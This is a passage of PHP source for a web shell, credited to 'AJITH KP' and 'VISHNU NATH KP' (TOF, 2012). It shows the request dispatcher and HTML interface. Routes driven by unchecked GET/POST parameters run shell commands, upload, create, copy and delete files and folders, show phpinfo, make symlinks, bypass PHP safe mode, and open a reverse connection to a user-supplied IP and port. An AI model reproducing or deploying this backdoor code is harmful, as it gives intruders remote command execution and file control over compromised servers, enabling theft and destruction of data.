2240. chdir($_GET['path']);
2241. ch_perm_bg();
2242. }
2243.  
2244. else if(isset($_REQUEST['del_fil']))
2245. {
2246. chdir($_GET['path']);
2247. delete_file();
2248. exit;
2249. }
2250. else if(isset($_REQUEST['phpinfo']))
2251. {
2252. chdir($_GET['path']);
2253. ob_clean();
2254. echo phpinfo();
2255. exit;
2256. }
2257. else if(isset($_REQUEST['del_dir']))
2258. {
2259. chdir($_GET['path']);
2260. $d_dir=$_GET['del_dir'];
2261. deldirs($d_dir);
2262. }
2263. else if(isset($_GET['path']) && isset($_GET['new_file']))
2264. {
2265. chdir($_GET['path']);
2266. mk_file_ui();
2267. }
2268. else if(isset($_GET['path']) && isset($_GET['new_f_name']) && isset($_GET['n_file_content']))
2269. {
2270. mk_file_bg();
2271. }
2272. else if(isset($_GET['path']) && isset($_GET['new_dir']))
2273. {
2274. chdir($_GET['path']);
2275. create_dir();
2276. }
2277. else if(isset($_GET['path']) && isset($_GET['cmdexe']))
2278. {
2279. chdir($_GET['path']);
2280. cmd();
2281. }
2282. else if(isset($_POST['upload_f']) && isset($_POST['path']))
2283. {
2284. upload_file();
2285. }
2286. else if(isset($_REQUEST['rs']))
2287. {
2288. reverse_conn_ui();
2289. }
2290. else if(isset($_GET['rev_option']) && isset($_GET['my_ip']) && isset($_GET['my_port']))
2291. {
2292. reverse_conn_bg();
2293. }
2294. else if(isset($_REQUEST['safe_mod']) && isset($_REQUEST['path']))
2295. {
2296. chdir($_GET['path']);
2297. safe_mode_fuck_ui();
2298. }
2299. else if(isset($_GET['path']) && isset($_GET['safe_mode']))
2300. {
2301. safe_mode_fuck();
2302. }
2303. else if(isset($_GET['path']) && isset($_REQUEST['forbd_dir']))
2304. {
2305. AccessDenied();
2306. }
2307.  
2308. else if(isset($_REQUEST['symlink']))
2309. {
2310. sym_link();
2311. }
2312.  
2313. else if(isset($_GET['path']) && isset($_GET['copy']))
2314. {
2315. copy_file_ui();
2316. }
2317. else if(isset($_GET['c_file']) && isset($_GET['c_target']) &&isset($_GET['cn_name']))
2318. {
2319. copy_file_bg();
2320. }
2321. else
2322. {
2323. filemanager_bg();
2324. }
2325.  
2326. ////////////////////////////// End Frond End Calls //////////////////////////////
2327.  
2328. echo "</div><div id=result><center><p><table class='tbl'>
2329. <tr><td><form method='GET'>PWD : <input size='50' name='path' value=".getcwd()."><input type='submit' value=' >> ' /></form></td></tr></table>
2330. <table class='tbl'><tr>
2331. <td><form style='float:right;' method='GET'><input name='path' value=".getcwd()." type=hidden><span> New File : </span><input type='submit' value=' >> ' ><input size='40' name='new_file' /></form>
2332. </td>
2333. <td><form style='float:left;' method='GET'><input name='path' value=".getcwd()." type=hidden><input size='40' name='new_dir'><input type='submit' value=' >> ' /><span> : New Dir</span></form>
2334. </td>
2335. </tr>
2336. <tr>
2337. <td><form style='float:right;' method='GET'><input style='float:left;' name='path' value=".getcwd()." type=hidden><span>CMD : </span><input type='submit' value=' >> ' ><input name='cmdexe' size='40' /></form>
2338. </td>
2339. <td><form style='float:left;' method='POST' enctype=\"multipart/form-data\"><input name='path' value=".getcwd()." type=hidden><input size='27' name='upload_f' type='file'><input type='submit' name='upload_f' value=' >> ' /><span> : Upload File</span></form>
2340. </td>
2341. </tr>
2342. </table></p><p><font size=4 color=green>&copy <a style='color:green; text-decoration:none;' href=http://facebook.com/ajithkp560>AJITH KP</a> & <a style='color:green; text-decoration:none;' href='http://www.facebook.com/vishnunathkp'>VISHNU NATH KP</a> &copy</font><br />&reg TOF [2012] &reg</div>"
2343. ?>